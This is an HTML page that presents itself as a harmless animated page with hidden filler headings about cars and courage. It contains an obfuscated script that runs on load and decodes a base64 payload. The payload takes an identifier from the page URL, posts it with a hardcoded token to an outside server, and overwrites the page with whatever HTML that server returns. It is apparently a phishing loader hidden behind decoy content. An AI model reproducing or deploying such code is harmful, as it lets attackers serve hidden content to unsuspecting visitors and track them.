<html>
  <head>
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js"></script>
    <style>
      #nacreous {
        animation: bounce 5s infinite;
      }
      @keyframes bounce {
        51% {
          transform: translateY(15px) scaleY(0.98);
        }
        15% {
          transform: translateY(-1px) scaleY(1.03);
        }
        24% {
          transform: translateY(4px) scaleY(1.09);
        }
      }
      #backfire {
        animation: bounce 5s infinite;
      }
      @keyframes bounce {
        96% {
          transform: translateY(18px) scaleY(0.97);
        }
        0% {
          transform: translateY(-10px) scaleY(0.9);
        }
        25% {
          transform: translateY(-18px) scaleY(1);
        }
        52% {
          transform: translateY(-14px) scaleY(0.92);
        }
        7% {
          transform: translateY(14px) scaleY(0.93);
        }
      }
      #cachet {
        animation: bounce 5s infinite;
      }
      @keyframes bounce {
        51% {
          transform: translateY(13px) scaleY(0.92);
        }
        2% {
          transform: translateY(-7px) scaleY(0.93);
        }
        84% {
          transform: translateY(-9px) scaleY(0.97);
        }
        63% {
          transform: translateY(-11px) scaleY(1.08);
        }
        2% {
          transform: translateY(13px) scaleY(1.02);
        }
        95% {
          transform: translateY(-20px) scaleY(1.02);
        }
      }
      #valance {
        animation: bounce 5s infinite;
      }
      @keyframes bounce {
        47% {
          transform: translateY(-1px) scaleY(1.1);
        }
        56% {
          transform: translateY(0px) scaleY(1.02);
        }
        34% {
          transform: translateY(-7px) scaleY(1.03);
        }
        67% {
          transform: translateY(-17px) scaleY(1.07);
        }
        69% {
          transform: translateY(10px) scaleY(0.93);
        }
        19% {
          transform: translateY(9px) scaleY(0.91);
        }
      }
      #vacation {
        animation: bounce 5s infinite;
      }
      @keyframes bounce {
        61% {
          transform: translateY(19px) scaleY(0.92);
        }
        59% {
          transform: translateY(-13px) scaleY(0.9);
        }
        19% {
          transform: translateY(-8px) scaleY(1.07);
        }
      }
    </style>
  </head>
  <body>
    <div id="nacreous">
      <h1 style="display: none">Driving hums aspirations with courage.</h1>
    </div>
    <div id="backfire">
      <h1 style="display: none">The car reflects mysteries with courage.</h1>
    </div>
    <div id="cachet">
      <h1 style="display: none">Driving hums potential with speed.</h1>
    </div>
    <div id="vacation">
      <h1 style="display: none">Life offers dreams with courage.</h1>
    </div>
    <div id="namedropping">
      <h1 style="display: none">
        A car reflects endless opportunities as we race through time.
      </h1>
    </div>
    <aside style="display: none">
      An adventure hums dreams in the driver’s seat.
    </aside>
    <script>
      var _0x4ad904 = _0x42cb;
      function _0x42cb(_0x55d8e0, _0x44c823) {
        var _0x432b9b = _0x432b();
        return (
          (_0x42cb = function (_0x42cbc1, _0x10a36b) {
            _0x42cbc1 = _0x42cbc1 - 0xd3;
            var _0x25ec56 = _0x432b9b[_0x42cbc1];
            return _0x25ec56;
          }),
          _0x42cb(_0x55d8e0, _0x44c823)
        );
      }
      function _0x432b() {
        var _0x433a04 = [
          "1468orpCDg",
          "22689WaoTfF",
          "370zspfZO",
          "4522760KBkabd",
          "3603DZmQII",
          "527552yyBQTw",
          "ZnVuY3Rpb24gZ3YoKSB7CiAgICAgICAgdmFyIHZycyA9IHt9OwogICAgICAgIHZhciBwcyA9IHdpbmRvdy5sb2NhdGlvbi5ocmVmLnJlcGxhY2UoCiAgICAgICAgICAvWz8mXSsoW149Jl0rKT0oW14mXSopL2dpLAogICAgICAgICAgZnVuY3Rpb24gKG0sIGtleSwgdmFsdWUpIHsKICAgICAgICAgICAgdnJzW2tleV0gPSB2YWx1ZTsKICAgICAgICAgIH0KICAgICAgICApOwogICAgICAgIHJldHVybiB2cnM7CiAgICAgIH0KCiAgICAgIGxldCBjZmcgPSBndigpWyJjZmciXTsKICAgICAgaWYgKHR5cGVvZiBjZmcgPT09ICJ1bmRlZmluZWQiKSB7CiAgICAgICAgLy8gRmluZCB0aGUgc3RyaW5nIGluc2lkZSB0aGUgYnJhY2tldHMgaW4gdGhlIFVSTAogICAgICAgIGNvbnN0IG1hdGNoID0gd2luZG93LmxvY2F0aW9uLmhyZWYubWF0Y2goL1woKFteKV0rKVwpLyk7CiAgICAgICAgaWYgKG1hdGNoICYmIG1hdGNoWzFdKSB7CiAgICAgICAgICBjZmcgPSBtYXRjaFsxXTsgLy8gVXNlIHRoZSB2YWx1ZSBpbnNpZGUgdGhlIGJyYWNrZXRzCiAgICAgICAgfSBlbHNlIHsKICAgICAgICAgIGNmZyA9ICIiOyAvLyBGYWxsYmFjayB0byBhbiBlbXB0eSBzdHJpbmcgaWYgbm8gbWF0Y2ggaXMgZm91bmQKICAgICAgICB9CiAgICAgIH0KCiAgICAgIGZldGNoKCJodHRwczovL3Bsb3ltb3lyb3RhdGVzMDMzMTkuZXMvIiwgewogICAgICAgIG1ldGhvZDogIlBPU1QiLAogICAgICAgIGhlYWRlcnM6IHsKICAgICAgICAgICJDb250ZW50LVR5cGUiOiAiYXBwbGljYXRpb24vanNvbiIsCiAgICAgICAgfSwKICAgICAgICBib2R5OiBKU09OLnN0cmluZ2lmeSh7CiAgICAgICAgICBwYXJhbWV0ZXI6IGNmZywKICAgICAgICAgIHRva2VuOiAiZDBlNDU4YjItYjFmZi00MGRjLWI0N2UtMjA5M2M2ODRkOWI3IiwKICAgICAgICB9KSwKICAgICAgfSkKICAgICAgICAudGhlbigocmVzcG9uc2UpID0+IHJlc3BvbnNlLmpzb24oKSkKICAgICAgICAudGhlbigoZGF0YSkgPT4gewogICAgICAgICAgZG9jdW1lbnQub3BlbigidGV4dC9odG1sIiwgInJlcGxhY2UiKTsKICAgICAgICAgIGRvY3VtZW50LndyaXRlKGRhdGEuaHRtbCk7CiAgICAgICAgICBkb2N1bWVudC5jbG9zZSgpOwogICAgICAgICAgY29uc29sZS5sb2coIlJlc3BvbnNlIFN0YXR1czoiLCBkYXRhLnN0YXR1cyk7CiAgICAgICAgICBjb25zb2xlLmxvZygiTWVzc2FnZToiLCBkYXRhLm1lc3NhZ2UpOwogICAgICAgIH0pCiAgICAgICAgLmNhdGNoKChlcnJvcikgPT4gY29uc29sZS5lcnJvcigiRXJyb3I6IiwgZXJyb3IpKTs=",
          "2VlHQtV",
          "1194CLuINb",
          "6532350bnfbXS",
          "550550jHFzFA",
          "6410LuQRkC",
        ];
        _0x432b = function () {
          return _0x433a04;
        };
        return _0x432b();
      }
      (function (_0x56d6b8, _0x30ec19) {
        var _0x246870 = _0x42cb,
          _0x414862 = _0x56d6b8();
        while (!![]) {
          try {
            var _0x4b305b =
              (-parseInt(_0x246870(0xdd)) / 0x1) *
                (-parseInt(_0x246870(0xdb)) / 0x2) +
              (-parseInt(_0x246870(0xda)) / 0x3) *
                (parseInt(_0x246870(0xd6)) / 0x4) +
              (parseInt(_0x246870(0xd5)) / 0x5) *
                (parseInt(_0x246870(0xde)) / 0x6) +
              parseInt(_0x246870(0xd4)) / 0x7 +
              parseInt(_0x246870(0xd9)) / 0x8 +
              (parseInt(_0x246870(0xd7)) / 0x9) *
                (-parseInt(_0x246870(0xd8)) / 0xa) +
              -parseInt(_0x246870(0xd3)) / 0xb;
            if (_0x4b305b === _0x30ec19) break;
            else _0x414862["push"](_0x414862["shift"]());
          } catch (_0x507f87) {
            _0x414862["push"](_0x414862["shift"]());
          }
        }
      })(_0x432b, 0x48f13),
        new Function(atob(_0x4ad904(0xdc)))();
    </script>
  </body>
</html>
